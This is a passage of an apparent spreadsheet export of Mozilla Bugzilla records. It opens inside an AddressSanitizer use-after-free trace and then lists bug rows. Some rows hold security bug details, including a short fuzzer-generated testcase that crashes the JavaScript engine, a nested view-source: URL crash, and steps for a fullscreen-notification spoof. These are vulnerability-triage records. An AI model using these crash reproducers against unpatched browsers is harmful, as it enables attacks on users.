    #2 0x7f135a4fda6a in SweepZones(js::FreeOp*, bool) /builds/slave/m-cen-l64-dbg-asan-ntly-000000/build/js/src/jsgc.cpp:2558:0
    #3 0x7f135a4fcc79 in EndSweepPhase(JSRuntime*, js::JSGCInvocationKind, bool) /builds/slave/m-cen-l64-dbg-asan-ntly-000000/build/js/src/jsgc.cpp:3906:0
    #4 0x7f135a4fab7e in IncrementalCollectSlice(JSRuntime*, long, JS::gcreason::Reason, js::JSGCInvocationKind) /builds/slave/m-cen-l64-dbg-asan-ntly-000000/build/js/src/jsgc.cpp:4308:0
    #5 0x7f135a4f9993 in GCCycle(JSRuntime*, bool, long, js::JSGCInvocationKind, JS::gcreason::Reason) /builds/slave/m-cen-l64-dbg-asan-ntly-000000/build/js/src/jsgc.cpp:4422:0
    #6 0x7f135a4ec10e in Collect(JSRuntime*, bool, long, js::JSGCInvocationKind, JS::gcreason::Reason) /builds/slave/m-cen-l64-dbg-asan-ntly-000000/build/js/src/jsgc.cpp:4581:0
    #7 0x7f1357bea26a in nsXPCComponents_Utils::ForceGC() /builds/slave/m-cen-l64-dbg-asan-ntly-000000/build/js/xpconnect/src/XPCComponents.cpp:4012:0
    #8 0x7f1359014b05 in NS_InvokeByIndex /builds/slave/m-cen-l64-dbg-asan-ntly-000000/build/xpcom/reflect/xptcall/src/md/unix/xptcinvoke_x86_64_unix.cpp:162:0
    #9 0x7f1357c69c63 in CallMethodHelper::Call() /builds/slave/m-cen-l64-dbg-asan-ntly-000000/build/js/xpconnect/src/XPCWrappedNative.cpp:2267:0
    #10 0x7f1357c69913 in XPCWrappedNative::CallMethod(XPCCallContext&amp;, XPCWrappedNative::CallMode) /builds/slave/m-cen-l64-dbg-asan-ntly-000000/build/js/xpconnect/src/XPCWrappedNative.cpp:2233:0
    #11 0x7f1357c7ebe7 in XPC_WN_CallMethod(JSContext*, unsigned int, JS::Value*) /builds/slave/m-cen-l64-dbg-asan-ntly-000000/build/js/xpconnect/src/XPCWrappedNativeJSOps.cpp:1480:0
    #12 0x7f135a299c48 in js::CallJSNative(JSContext*, int (*)(JSContext*, unsigned int, JS::Value*), JS::CallArgs const&amp;) /builds/slave/m-cen-l64-dbg-asan-ntly-000000/build/js/src/jscntxtinlines.h:349:0
    #13 0x7f135a299395 in js::Invoke(JSContext*, JS::CallArgs, js::MaybeConstruct) /builds/slave/m-cen-l64-dbg-asan-ntly-000000/build/js/src/vm/Interpreter.cpp:381:0
    #14 0x7f135a2937fa in
previously allocated by thread T0 here:
    #0 0x43b1a0 in malloc ??:?
    #1 0x7f135a240f59 in js::MallocProvider&lt;JSContext&gt;::malloc_(unsigned long) /builds/slave/m-cen-l64-dbg-asan-ntly-000000/build/js/src/jscntxt.h:558:0
    #2 0x7f135a4ecd73 in JSCompartment* js::MallocProvider&lt;JSContext&gt;::new_&lt;JSCompartment, JS::Zone*&gt;(JS::Zone*) /builds/slave/m-cen-l64-dbg-asan-ntly-000000/build/js/src/jscntxt.h:623:0
    #3 0x7f135a4ec99e in js::NewCompartment(JSContext*, JS::Zone*, JSPrincipals*) /builds/slave/m-cen-l64-dbg-asan-ntly-000000/build/js/src/jsgc.cpp:4724:0
    #4 0x7f135a4023fb in JS_NewGlobalObject(JSContext*, JSClass*, JSPrincipals*, unsigned long) /builds/slave/m-cen-l64-dbg-asan-ntly-000000/build/js/src/jsapi.cpp:3446:0
    #5 0x7f1357cd8e60 in xpc::CreateGlobalObject(JSContext*, JSClass*, nsIPrincipal*, unsigned long) /builds/slave/m-cen-l64-dbg-asan-ntly-000000/build/js/xpconnect/src/nsXPConnect.cpp:994:0
    #6 0x7f1357c5e80a in XPCWrappedNative::WrapNewGlobal(xpcObjectHelper&amp;, nsIPrincipal*, bool, unsigned long, XPCWrappedNative**) /builds/slave/m-cen-l64-dbg-asan-ntly-000000/build/js/xpconnect/src/XPCWrappedNative.cpp:318:0
    #7 0x7f1357cd972e in nsXPConnect::InitClassesWithNewWrappedGlobal(JSContext*, nsISupports*, nsIPrincipal*, unsigned int, unsigned long, nsIXPConnectJSObjectHolder**) /builds/slave/m-cen-l64-dbg-asan-ntly-000000/build/js/xpconnect/src/nsXPConnect.cpp:1050:0
    #8 0x7f135735cffb in CreateNativeGlobalForInner(JSContext*, nsGlobalWindow*, nsIURI*, nsIPrincipal*, JSObject**, nsIXPConnectJSObjectHolder**) /builds/slave/m-cen-l64-dbg-asan-ntly-000000/build/dom/base/nsGlobalWindow.cpp:2142:0
Shadow byte and word:
  0x1fe266fce00c: fd
  0x1fe266fce008: fd fd fd fd fd fd fd fd
More shadow bytes:
  0x1fe266fcdfe8: 00 00 00 00 00 00 00 00
  0x1fe266fcdff0: 00 00 00 00 00 00 00 00
  0x1fe266fcdff8: 00 00 00 00 00 00 00 00
  0x1fe266fce000: fa fa fa fa fa fa fa fa
=&gt;0x1fe266fce008: fd fd fd fd fd fd fd fd
  0x1fe266fce010: fd fd fd fd fd fd fd fd
  0x1fe266fce018: fd fd fd fd fd fd fd fd
  0x1fe266fce020: fd fd fd fd fd fd fd fd
  0x1fe266fce028: fd fd fd fd fd fd fd fd
Stats: 442M malloced (440M for red zones) by 993366 calls
Stats: 41M realloced by 42405 calls
Stats: 412M freed by 851905 calls
Stats: 376M really freed by 790743 calls
Stats: 270M (69346 full pages) mmaped in 483 calls
  mmaps   by size class: 7:159705; 8:57316; 9:17391; 10:8176; 11:7395; 12:1792; 13:1856; 14:512; 15:256; 16:656; 17:456; 18:26; 19:36; 20:23; 21:11;
  mallocs by size class: 7:688188; 8:180185; 9:48390; 10:33029; 11:23787; 12:5112; 13:6965; 14:2704; 15:980; 16:1981; 17:1831; 18:86; 19:53; 20:46; 21:29;
  frees   by size class: 7:599202; 8:143470; 9:39569; 10:29869; 11:21822; 12:4171; 13:6532; 14:2509; 15:864; 16:1880; 17:1815; 18:81; 19:49; 20:44; 21:28;
  rfrees  by size class: 7:566830; 8:128961; 9:33347; 10:26920; 11:18811; 12:3575; 13:5684; 14:2229; 15:794; 16:1768; 17:1632; 18:78; 19:45; 20:41; 21:28;
Stats: malloc large: 5006 small slow: 11181</t>
        </is>
      </c>
      <c r="X4635" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="4636">
      <c r="A4636" t="n">
        <v>994444</v>
      </c>
      <c r="B4636" t="inlineStr">
        <is>
          <t>2014-04-09 18:45:36 -0700</t>
        </is>
      </c>
      <c r="C4636" t="inlineStr">
        <is>
          <t>Fix !resumeAfter for JSOP_LOOPENTRY in Ion-to-Baseline bailout</t>
        </is>
      </c>
      <c r="D4636" t="inlineStr">
        <is>
          <t>2016-06-04 15:33:03 -0700</t>
        </is>
      </c>
      <c r="E4636" t="n">
        <v>1</v>
      </c>
      <c r="F4636" t="n">
        <v>1</v>
      </c>
      <c r="G4636" t="n">
        <v>3</v>
      </c>
      <c r="H4636" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I4636" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J4636" t="inlineStr">
        <is>
          <t>JavaScript Engine: JIT</t>
        </is>
      </c>
      <c r="K4636" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L4636" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M4636" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N4636" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O4636" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P4636" t="inlineStr">
        <is>
          <t>[adv-main31+]</t>
        </is>
      </c>
      <c r="Q4636" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R4636" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S4636" t="inlineStr">
        <is>
          <t>mozilla31</t>
        </is>
      </c>
      <c r="T4636" t="n">
        <v>1</v>
      </c>
      <c r="U4636" t="n">
        <v>0</v>
      </c>
      <c r="V4636" t="n">
        <v>22</v>
      </c>
      <c r="W4636" t="inlineStr">
        <is>
          <t>We try to find the next non-LOOPENTRY/NOP/LOOPHEAD/GOTO pc when bailing out on a !resumeAfter loopentry. If the loop body is empty, we get caught in an infinite loop.</t>
        </is>
      </c>
      <c r="X4636" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="4637">
      <c r="A4637" t="n">
        <v>1440280</v>
      </c>
      <c r="B4637" t="inlineStr">
        <is>
          <t>2018-02-22 04:25:00 -0800</t>
        </is>
      </c>
      <c r="C4637" t="inlineStr">
        <is>
          <t>[RTL] Device name should be right aligned</t>
        </is>
      </c>
      <c r="D4637" t="inlineStr">
        <is>
          <t>2018-03-05 07:20:53 -0800</t>
        </is>
      </c>
      <c r="E4637" t="n">
        <v>1</v>
      </c>
      <c r="F4637" t="n">
        <v>1</v>
      </c>
      <c r="G4637" t="n">
        <v>2</v>
      </c>
      <c r="H4637" t="inlineStr">
        <is>
          <t>Client Software</t>
        </is>
      </c>
      <c r="I4637" t="inlineStr">
        <is>
          <t>Firefox for iOS</t>
        </is>
      </c>
      <c r="J4637" t="inlineStr">
        <is>
          <t>General</t>
        </is>
      </c>
      <c r="K4637" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L4637" t="inlineStr">
        <is>
          <t>Other</t>
        </is>
      </c>
      <c r="M4637" t="inlineStr">
        <is>
          <t>iOS</t>
        </is>
      </c>
      <c r="N4637" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O4637" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P4637" t="inlineStr"/>
      <c r="Q4637" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R4637" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S4637" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T4637" t="n">
        <v>1</v>
      </c>
      <c r="U4637" t="n">
        <v>0</v>
      </c>
      <c r="V4637" t="n">
        <v>5</v>
      </c>
      <c r="W4637" t="inlineStr">
        <is>
          <t>1. Sign into sync.
2. Go to Firefox settings and tap on the email address to enter sync settings.
3. Check the device name.
Expected: The device name should be right aligned.
Actual: The device name is left aligned.</t>
        </is>
      </c>
      <c r="X4637" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="4638">
      <c r="A4638" t="n">
        <v>1295002</v>
      </c>
      <c r="B4638" t="inlineStr">
        <is>
          <t>2016-08-13 21:32:35 -0700</t>
        </is>
      </c>
      <c r="C4638" t="inlineStr">
        <is>
          <t>Recursive keyword fixup for many-nested view-source: URLs crashes</t>
        </is>
      </c>
      <c r="D4638" t="inlineStr">
        <is>
          <t>2017-03-10 10:47:20 -0800</t>
        </is>
      </c>
      <c r="E4638" t="n">
        <v>1</v>
      </c>
      <c r="F4638" t="n">
        <v>1</v>
      </c>
      <c r="G4638" t="n">
        <v>3</v>
      </c>
      <c r="H4638" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I4638" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J4638" t="inlineStr">
        <is>
          <t>DOM: Navigation</t>
        </is>
      </c>
      <c r="K4638" t="inlineStr">
        <is>
          <t>48 Branch</t>
        </is>
      </c>
      <c r="L4638" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M4638" t="inlineStr">
        <is>
          <t>Windows 10</t>
        </is>
      </c>
      <c r="N4638" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O4638" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P4638" t="inlineStr">
        <is>
          <t>[adv-main52+] stack exhaustion</t>
        </is>
      </c>
      <c r="Q4638" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R4638" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S4638" t="inlineStr">
        <is>
          <t>mozilla52</t>
        </is>
      </c>
      <c r="T4638" t="n">
        <v>1</v>
      </c>
      <c r="U4638" t="n">
        <v>0</v>
      </c>
      <c r="V4638" t="n">
        <v>10</v>
      </c>
      <c r="W4638" t="inlineStr">
        <is>
          <t>Created attachment 8780885
example.html
User Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:48.0) Gecko/20100101 Firefox/48.0
Build ID: 20160726073904
Steps to reproduce:
Lots of view-source: strung together cause the browser to crash.
Actual results:
The browser crashed.
Expected results:
Viewing the source of view-source is pointless &amp; should be blocked.</t>
        </is>
      </c>
      <c r="X4638" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="4639">
      <c r="A4639" t="n">
        <v>1251922</v>
      </c>
      <c r="B4639" t="inlineStr">
        <is>
          <t>2016-02-28 03:29:26 -0800</t>
        </is>
      </c>
      <c r="C4639" t="inlineStr">
        <is>
          <t>Assertion failure: isNurseryAllocAllowed(), at js/src/gc/Allocator.cpp:153</t>
        </is>
      </c>
      <c r="D4639" t="inlineStr">
        <is>
          <t>2016-09-22 17:19:50 -0700</t>
        </is>
      </c>
      <c r="E4639" t="n">
        <v>1</v>
      </c>
      <c r="F4639" t="n">
        <v>1</v>
      </c>
      <c r="G4639" t="n">
        <v>3</v>
      </c>
      <c r="H4639" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I4639" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J4639" t="inlineStr">
        <is>
          <t>JavaScript Engine</t>
        </is>
      </c>
      <c r="K4639" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L4639" t="inlineStr">
        <is>
          <t>x86_64</t>
        </is>
      </c>
      <c r="M4639" t="inlineStr">
        <is>
          <t>macOS</t>
        </is>
      </c>
      <c r="N4639" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O4639" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P4639" t="inlineStr">
        <is>
          <t>[jsbugmon:update][adv-main46+][adv-esr45.1+]</t>
        </is>
      </c>
      <c r="Q4639" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R4639" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S4639" t="inlineStr">
        <is>
          <t>mozilla48</t>
        </is>
      </c>
      <c r="T4639" t="n">
        <v>1</v>
      </c>
      <c r="U4639" t="n">
        <v>0</v>
      </c>
      <c r="V4639" t="n">
        <v>36</v>
      </c>
      <c r="W4639" t="inlineStr">
        <is>
          <t>The following testcase crashes on mozilla-central revision 5e0140b6d118 (build with --enable-debug --enable-more-deterministic, run with --fuzzing-safe --ion-offthread-compile=off --ion-eager):
// jsfunfuzz-generated
enableShellObjectMetadataCallback();
// Adapted from randomly chosen test: js/src/jit-test/tests/profiler/bug1211962.js
var lfGlobal = newGlobal();
for (lfLocal in this) {
    lfGlobal[lfLocal] = this[lfLocal];
}
const script = 'oomTest(() =&gt; getBacktrace({}));';
lfGlobal.offThreadCompileScript(script);
Backtrace:
0   js-dbg-64-dm-clang-darwin-5e0140b6d118	0x000000010096f868 JSObject* js::gc::GCRuntime::tryNewNurseryObject&lt;(js::AllowGC)0&gt;(JSContext*, unsigned long, unsigned long, js::Class const*) + 232 (Allocator.cpp:153)
1   js-dbg-64-dm-clang-darwin-5e0140b6d118	0x00000001005e87df js::NewObjectCache::newObjectFromHit(JSContext*, int, js::gc::InitialHeap) + 383 (Runtime-inl.h:63)
2   js-dbg-64-dm-clang-darwin-5e0140b6d118	0x00000001005ca5c7 js::NewObjectWithClassProtoCommon(js::ExclusiveContext*, js::Class const*, JS::Handle&lt;JSObject*&gt;, js::gc::AllocKind, js::NewObjectKind) + 311 (jsobj.cpp:773)
3   js-dbg-64-dm-clang-darwin-5e0140b6d118	0x000000010075e878 ShellObjectMetadataCallback(JSContext*, JS::Handle&lt;JSObject*&gt;) + 200 (jsobjinlines.h:746)
4   js-dbg-64-dm-clang-darwin-5e0140b6d118	0x000000010053dc0a JSCompartment::setNewObjectMetadata(JSContext*, JS::Handle&lt;JSObject*&gt;) + 170 (jscompartment.cpp:893)
5   js-dbg-64-dm-clang-darwin-5e0140b6d118	0x00000001005e3370 js::SetNewObjectMetadata(js::ExclusiveContext*, JSObject*) + 384 (RootingAPI.h:666)
6   js-dbg-64-dm-clang-darwin-5e0140b6d118	0x00000001005ca2b3 NewObject(js::ExclusiveContext*, JS::Handle&lt;js::ObjectGroup*&gt;, js::gc::AllocKind, js::NewObjectKind, unsigned int) + 387 (jsobj.cpp:668)
7   js-dbg-64-dm-clang-darwin-5e0140b6d118	0x00000001005c9d81 js::NewObjectWithGivenTaggedProto(js::ExclusiveContext*, js::Class const*, JS::Handle&lt;js::TaggedProto&gt;, js::gc::AllocKind, js::NewObjectKind, unsigned int) + 177 (jsobj.cpp:729)
8   js-dbg-64-dm-clang-darwin-5e0140b6d118	0x00000001006ddf7f CreateBlankProto(JSContext*, js::Class const*, JS::Handle&lt;JSObject*&gt;, JS::Handle&lt;JSObject*&gt;) + 95 (NativeObject.h:1453)
9   js-dbg-64-dm-clang-darwin-5e0140b6d118	0x00000001006ddea9 js::GlobalObject::createBlankPrototype(JSContext*, js::Class const*) + 105 (RootingAPI.h:666)
10  js-dbg-64-dm-clang-darwin-5e0140b6d118	0x000000010058ef3c js::GlobalObject::initIteratorProto(JSContext*, JS::Handle&lt;js::GlobalObject*&gt;) + 156 (GlobalObject.h:337)
11  js-dbg-64-dm-clang-darwin-5e0140b6d118	0x000000010054809e js::GlobalObject::getOrCreateObject(JSContext*, unsigned int, bool (*)(JSContext*, JS::Handle&lt;js::GlobalObject*&gt;)) + 126 (GlobalObject.h:529)
12  js-dbg-64-dm-clang-darwin-5e0140b6d118	0x00000001006dae86 js::GlobalObject::initStarGenerators(JSContext*, JS::Handle&lt;js::GlobalObject*&gt;) + 166 (GlobalObject.h:537)
13  js-dbg-64-dm-clang-darwin-5e0140b6d118	0x00000001006e55ac EnsureParserCreatedClasses(JSContext*, js::ParseTaskKind) + 124 (HelperThreads.cpp:386)
14  js-dbg-64-dm-clang-darwin-5e0140b6d118	0x00000001006e2293 CreateGlobalForOffThreadParse(JSContext*, js::ParseTaskKind, js::gc::AutoSuppressGC const&amp;) + 227 (HelperThreads.cpp:422)
15  js-dbg-64-dm-clang-darwin-5e0140b6d118	0x00000001006e1eab js::StartOffThreadParseScript(JSContext*, JS::ReadOnlyCompileOptions const&amp;, char16_t const*, unsigned long, void (*)(void*, void*), void*) + 75 (HelperThreads.cpp:466)
16  js-dbg-64-dm-clang-darwin-5e0140b6d118	0x0000000100013af2 OffThreadCompileScript(JSContext*, unsigned int, JS::Value*) + 1330 (js.cpp:3766)
17  js-dbg-64-dm-clang-darwin-5e0140b6d118	0x0000000100798022 js::Invoke(JSContext*, JS::CallArgs const&amp;, js::MaybeConstruct) + 738 (jscntxtinlines.h:236)
18  js-dbg-64-dm-clang-darwin-5e0140b6d118	0x000000010079876b js::Invoke(JSContext*, JS::Value const&amp;, JS::Value const&amp;, unsigned int, JS::Value const*, JS::MutableHandle&lt;JS::Value&gt;) + 555 (Interpreter.cpp:530)
19  js-dbg-64-dm-clang-darwin-5e0140b6d118	0x00000001001b7d31 js::jit::DoCallFallback(JSContext*, js::jit::BaselineFrame*, js::jit::ICCall_Fallback*, unsigned int, JS::Value*, JS::MutableHandle&lt;JS::Value&gt;) + 3105 (BaselineIC.cpp:6136)
20  ???                           	0x0000000101ebb45b 0 + 4327191643
21  ???                           	0x000000010200ced0 0 + 4328574672
Setting s-s as a start since this seems to involve a gc assertion.</t>
        </is>
      </c>
      <c r="X4639" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="4640">
      <c r="A4640" t="n">
        <v>810169</v>
      </c>
      <c r="B4640" t="inlineStr">
        <is>
          <t>2012-11-08 17:57:35 -0800</t>
        </is>
      </c>
      <c r="C4640" t="inlineStr">
        <is>
          <t>JSCompartment::global_ needs a read barrier</t>
        </is>
      </c>
      <c r="D4640" t="inlineStr">
        <is>
          <t>2014-11-19 19:36:07 -0800</t>
        </is>
      </c>
      <c r="E4640" t="n">
        <v>1</v>
      </c>
      <c r="F4640" t="n">
        <v>1</v>
      </c>
      <c r="G4640" t="n">
        <v>3</v>
      </c>
      <c r="H4640" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I4640" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J4640" t="inlineStr">
        <is>
          <t>JavaScript Engine</t>
        </is>
      </c>
      <c r="K4640" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L4640" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M4640" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N4640" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O4640" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P4640" t="inlineStr">
        <is>
          <t>[js:t][adv-main19+]</t>
        </is>
      </c>
      <c r="Q4640" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R4640" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S4640" t="inlineStr">
        <is>
          <t>mozilla20</t>
        </is>
      </c>
      <c r="T4640" t="n">
        <v>1</v>
      </c>
      <c r="U4640" t="n">
        <v>0</v>
      </c>
      <c r="V4640" t="n">
        <v>16</v>
      </c>
      <c r="W4640" t="inlineStr">
        <is>
          <t>Let us have pity on this field, for it is weak.</t>
        </is>
      </c>
      <c r="X4640" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="4641">
      <c r="A4641" t="n">
        <v>1821155</v>
      </c>
      <c r="B4641" t="inlineStr">
        <is>
          <t>2023-03-08 13:04:52 -0800</t>
        </is>
      </c>
      <c r="C4641" t="inlineStr">
        <is>
          <t>keyboard layout hides fullscreen notification on landscape mode on firefoxfocus, leads to spoof</t>
        </is>
      </c>
      <c r="D4641" t="inlineStr">
        <is>
          <t>2024-05-30 11:06:33 -0700</t>
        </is>
      </c>
      <c r="E4641" t="n">
        <v>1</v>
      </c>
      <c r="F4641" t="n">
        <v>1</v>
      </c>
      <c r="G4641" t="n">
        <v>2</v>
      </c>
      <c r="H4641" t="inlineStr">
        <is>
          <t>Client Software</t>
        </is>
      </c>
      <c r="I4641" t="inlineStr">
        <is>
          <t>Focus</t>
        </is>
      </c>
      <c r="J4641" t="inlineStr">
        <is>
          <t>General</t>
        </is>
      </c>
      <c r="K4641" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L4641" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M4641" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N4641" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O4641" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P4641" t="inlineStr">
        <is>
          <t>[reporter-external] [client-bounty-form] [verif?][adv-main112+]</t>
        </is>
      </c>
      <c r="Q4641" t="inlineStr">
        <is>
          <t>P2</t>
        </is>
      </c>
      <c r="R4641" t="inlineStr">
        <is>
          <t>S2</t>
        </is>
      </c>
      <c r="S4641" t="inlineStr">
        <is>
          <t>113 Branch</t>
        </is>
      </c>
      <c r="T4641" t="n">
        <v>1</v>
      </c>
      <c r="U4641" t="n">
        <v>0</v>
      </c>
      <c r="V4641" t="n">
        <v>19</v>
      </c>
      <c r="W4641" t="inlineStr">
        <is>
          <t>Created attachment 9321962
video_2023-03-09_03-56-27.mp4
I found a vulnerability in firefox focus (landscape mode) when click on the text box it opens keyboard layout when running fullscreen, keyboard layout covers fullscreen notification.
steps to generate
1. Go to http://103.186.0.20/fullscreenfocus.html
2. Click on TextBox (hide full screen notification)</t>
        </is>
      </c>
      <c r="X4641" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="4642">
      <c r="A4642" t="n">
        <v>1119378</v>
      </c>
      <c r="B4642" t="inlineStr">
        <is>
          <t>2015-01-08 10:21:08 -0800</t>
        </is>
      </c>
      <c r="C4642" t="inlineStr">
        <is>
          <t>Upgrade to Django 1.6</t>
        </is>
      </c>
      <c r="D4642" t="inlineStr">
        <is>
          <t>2015-01-16 14:01:58 -0800</t>
        </is>
      </c>
      <c r="E4642" t="n">
        <v>1</v>
      </c>
      <c r="F4642" t="n">
        <v>1</v>
      </c>
      <c r="G4642" t="n">
        <v>4</v>
      </c>
      <c r="H4642" t="inlineStr">
        <is>
          <t>Server Software</t>
        </is>
      </c>
      <c r="I4642" t="inlineStr">
        <is>
          <t>Socorro</t>
        </is>
      </c>
      <c r="J4642" t="inlineStr">
        <is>
          <t>Webapp</t>
        </is>
      </c>
      <c r="K4642" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L4642" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M4642" t="inlineStr">
        <is>
          <t>macOS</t>
        </is>
      </c>
      <c r="N4642" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O4642" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P4642" t="inlineStr"/>
      <c r="Q4642" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R4642" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S4642" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T4642" t="n">
        <v>1</v>
      </c>
      <c r="U4642" t="n">
        <v>0</v>
      </c>
      <c r="V4642" t="n">
        <v>3</v>
      </c>
      <c r="W4642" t="inlineStr">
        <is>
          <t>We're currently on Django 1.5.9 [0] which is no longer supported. No new security fixes.
We need to upgrade to 1.6 first. But 1.6 is soon going to stop being supported too and we can't move to 1.7 until we've moved entirely over to Python 2.7. 
[0] https://github.com/mozilla/socorro/blob/afeef77322e77c7148a134b48d46bda3936155a5/requirements.txt#L131</t>
        </is>
      </c>
      <c r="X4642" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="4643">
      <c r="A4643" t="n">
        <v>1234355</v>
      </c>
      <c r="B4643" t="inlineStr">
        <is>
          <t>2015-12-21 14:02:15 -0800</t>
        </is>
      </c>
      <c r="C4643" t="inlineStr">
        <is>
          <t>Remove "Don't ask me again" footgun option from the "enable DRM" info bar notification</t>
        </is>
      </c>
      <c r="D4643" t="inlineStr">
        <is>
          <t>2021-06-15 02:38:57 -0700</t>
        </is>
      </c>
      <c r="E4643" t="n">
        <v>1</v>
      </c>
      <c r="F4643" t="n">
        <v>1</v>
      </c>
      <c r="G4643" t="n">
        <v>2</v>
      </c>
      <c r="H4643" t="inlineStr">
        <is>
          <t>Client Software</t>
        </is>
      </c>
      <c r="I4643" t="inlineStr">
        <is>
          <t>Firefox</t>
        </is>
      </c>
      <c r="J4643" t="inlineStr">
        <is>
          <t>General</t>
        </is>
      </c>
      <c r="K4643" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L4643" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M4643" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N4643" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O4643" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P4643" t="inlineStr"/>
      <c r="Q4643" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R4643" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S4643" t="inlineStr">
        <is>
          <t>Firefox 47</t>
        </is>
      </c>
      <c r="T4643" t="n">
        <v>1</v>
      </c>
      <c r="U4643" t="n">
        <v>0</v>
      </c>
      <c r="V4643" t="n">
        <v>36</v>
      </c>
      <c r="W4643" t="inlineStr">
        <is>
          <t>We should replace the "You must enable DRM to play some audio or video on this page" info bar's "Options" drop-down menu with a "Not Now" button. If we allow the user to "Don't ask me again", then they will get into a state where they don't know why Netflix doesn't work. If this message is nagging the user too much, then they should either enable the Adobe CDM or stop trying to play DRM video with DRM disabled!
https://mxr.mozilla.org/mozilla-central/source/browser/locales/en-US/chrome/browser/browser.properties#670</t>
        </is>
      </c>
      <c r="X4643" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="4644">
      <c r="A4644" t="n">
        <v>1277614</v>
      </c>
      <c r="B4644" t="inlineStr">
        <is>
          <t>2016-06-02 10:14:41 -0700</t>
        </is>
      </c>
      <c r="C4644" t="inlineStr">
        <is>
          <t>Crash in mozilla::dom::PBlobChild::DestroySubtree</t>
        </is>
      </c>
      <c r="D4644" t="inlineStr">
        <is>
          <t>2016-07-25 17:08:56 -0700</t>
        </is>
      </c>
      <c r="E4644" t="n">
        <v>1</v>
      </c>
      <c r="F4644" t="n">
        <v>1</v>
      </c>
      <c r="G4644" t="n">
        <v>3</v>
      </c>
      <c r="H4644" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I4644" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J4644" t="inlineStr">
        <is>
          <t>IPC</t>
        </is>
      </c>
      <c r="K4644" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L4644" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M4644" t="inlineStr">
